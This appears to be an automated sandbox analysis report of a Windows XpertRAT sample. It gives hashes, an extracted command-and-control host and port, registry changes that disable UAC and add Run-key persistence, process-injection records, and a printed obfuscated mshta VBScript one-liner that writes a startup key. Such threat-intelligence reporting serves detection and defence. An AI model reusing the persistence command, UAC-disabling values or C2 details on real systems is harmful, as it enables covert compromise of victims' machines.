Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
27/01/2025, 01:06
Static task
static1
Behavioral task
behavioral1
Sample
0790d761632c5c449691b48d4900c9339ca838b3e96a39512793e6ddfd6f3779N.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
0790d761632c5c449691b48d4900c9339ca838b3e96a39512793e6ddfd6f3779N.exe
Resource
win10v2004-20241007-en
General
-
Target
0790d761632c5c449691b48d4900c9339ca838b3e96a39512793e6ddfd6f3779N.exe
-
Size
744KB
-
MD5
693d0198fe87eadd63dfff18819fb880
-
SHA1
e3b8cf8efa6af4ed3fd12c9586e34a5a91354891
-
SHA256
0790d761632c5c449691b48d4900c9339ca838b3e96a39512793e6ddfd6f3779
-
SHA512
6c7ee6e990e9d03f6d8e00e0aa6b4a976b35a7a2ccb4dd1dba4bca1af4afd367ec8832b23d25698781be025f17a5b9d09836d562fff8eafd20868eb6b99b1155
-
SSDEEP
12288:VzukkVr/MhE6JOA6lfHcb+L1LkUrzx0E+qKlR5yaMxTEa:NhE6JOAiPVgUrCvR5yaMxTEa
Malware Config
Extracted
xpertrat
3.1.9
Group
joeing.dnsfor.me:2011
P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5
Signatures
-
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" OPHAVSRETTEN.exe -
Windows security bypass 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UACDisableNotify = "0" OPHAVSRETTEN.exe -
XpertRAT Core payload 3 IoCs
resource yara_rule behavioral2/memory/4156-22-0x0000000000400000-0x0000000000444000-memory.dmp xpertrat behavioral2/memory/4156-24-0x0000000000400000-0x0000000000444000-memory.dmp xpertrat behavioral2/memory/4156-35-0x0000000000400000-0x0000000000444000-memory.dmp xpertrat -
Xpertrat family
-
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run OPHAVSRETTEN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 = "C:\\Users\\Admin\\AppData\\Roaming\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5.exe" OPHAVSRETTEN.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation 0790d761632c5c449691b48d4900c9339ca838b3e96a39512793e6ddfd6f3779N.exe -
Executes dropped EXE 3 IoCs
pid Process 1752 OPHAVSRETTEN.exe 4564 OPHAVSRETTEN.exe 4156 OPHAVSRETTEN.exe -
Windows security modification 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UACDisableNotify = "0" OPHAVSRETTEN.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 = "C:\\Users\\Admin\\AppData\\Roaming\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5.exe" OPHAVSRETTEN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 = "C:\\Users\\Admin\\AppData\\Roaming\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5.exe" OPHAVSRETTEN.exe -
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" OPHAVSRETTEN.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1752 set thread context of 4564 1752 OPHAVSRETTEN.exe 84 PID 4564 set thread context of 4156 4564 OPHAVSRETTEN.exe 85 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OPHAVSRETTEN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OPHAVSRETTEN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OPHAVSRETTEN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0790d761632c5c449691b48d4900c9339ca838b3e96a39512793e6ddfd6f3779N.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4564 OPHAVSRETTEN.exe 4564 OPHAVSRETTEN.exe 4564 OPHAVSRETTEN.exe 4564 OPHAVSRETTEN.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4156 OPHAVSRETTEN.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 4480 0790d761632c5c449691b48d4900c9339ca838b3e96a39512793e6ddfd6f3779N.exe 1752 OPHAVSRETTEN.exe 4564 OPHAVSRETTEN.exe 4156 OPHAVSRETTEN.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 4480 wrote to memory of 1396 4480 0790d761632c5c449691b48d4900c9339ca838b3e96a39512793e6ddfd6f3779N.exe 82 PID 4480 wrote to memory of 1396 4480 0790d761632c5c449691b48d4900c9339ca838b3e96a39512793e6ddfd6f3779N.exe 82 PID 4480 wrote to memory of 1396 4480 0790d761632c5c449691b48d4900c9339ca838b3e96a39512793e6ddfd6f3779N.exe 82 PID 4480 wrote to memory of 1752 4480 0790d761632c5c449691b48d4900c9339ca838b3e96a39512793e6ddfd6f3779N.exe 83 PID 4480 wrote to memory of 1752 4480 0790d761632c5c449691b48d4900c9339ca838b3e96a39512793e6ddfd6f3779N.exe 83 PID 4480 wrote to memory of 1752 4480 0790d761632c5c449691b48d4900c9339ca838b3e96a39512793e6ddfd6f3779N.exe 83 PID 1752 wrote to memory of 4564 1752 OPHAVSRETTEN.exe 84 PID 1752 wrote to memory of 4564 1752 OPHAVSRETTEN.exe 84 PID 1752 wrote to memory of 4564 1752 OPHAVSRETTEN.exe 84 PID 1752 wrote to memory of 4564 1752 OPHAVSRETTEN.exe 84 PID 1752 wrote to memory of 4564 1752 OPHAVSRETTEN.exe 84 PID 1752 wrote to memory of 4564 1752 OPHAVSRETTEN.exe 84 PID 1752 wrote to memory of 4564 1752 OPHAVSRETTEN.exe 84 PID 1752 wrote to memory of 4564 1752 OPHAVSRETTEN.exe 84 PID 1752 wrote to memory of 4564 1752 OPHAVSRETTEN.exe 84 PID 4564 wrote to memory of 4156 4564 OPHAVSRETTEN.exe 85 PID 4564 wrote to memory of 4156 4564 OPHAVSRETTEN.exe 85 PID 4564 wrote to memory of 4156 4564 OPHAVSRETTEN.exe 85 PID 4564 wrote to memory of 4156 4564 OPHAVSRETTEN.exe 85 PID 4564 wrote to memory of 4156 4564 OPHAVSRETTEN.exe 85 PID 4564 wrote to memory of 4156 4564 OPHAVSRETTEN.exe 85 PID 4564 wrote to memory of 4156 4564 OPHAVSRETTEN.exe 85 PID 4564 wrote to memory of 4156 4564 OPHAVSRETTEN.exe 85 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" OPHAVSRETTEN.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0790d761632c5c449691b48d4900c9339ca838b3e96a39512793e6ddfd6f3779N.exe"C:\Users\Admin\AppData\Local\Temp\0790d761632c5c449691b48d4900c9339ca838b3e96a39512793e6ddfd6f3779N.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\:\Run\sprgekasser"" : myKey = ""HKCU\Software\Microsoft\Windows\X\Run\NOME"" : myKey=replace(myKey,"":"",""CurrentVersion"") : WshShell.RegWrite myKey,""C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"",""REG_SZ"" : window.close")2⤵
- System Location Discovery: System Language Discovery
PID:1396
-
-
C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"3⤵
- UAC bypass
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4564 -
C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exeC:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe4⤵
- Adds policy Run key to start application
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4156
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
3Disable or Modify Tools
3Modify Registry
6Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
744KB
MD50c68bddfea48409ba3b94e6d034aafd1
SHA1d896c74375e40088e8ea700306f10cd1c320b419
SHA25630310184dfb608286ff8f6e9c9ded22ea70fffcaa7fe6ed250af4734cf7c130e
SHA512186016706c033900e41d30cb31408361744ff9c65143cba998d265338e7001012833bf467e339a2d3021f0d50cfd1b5288ead31851ecb26e6cb32dddcab2827e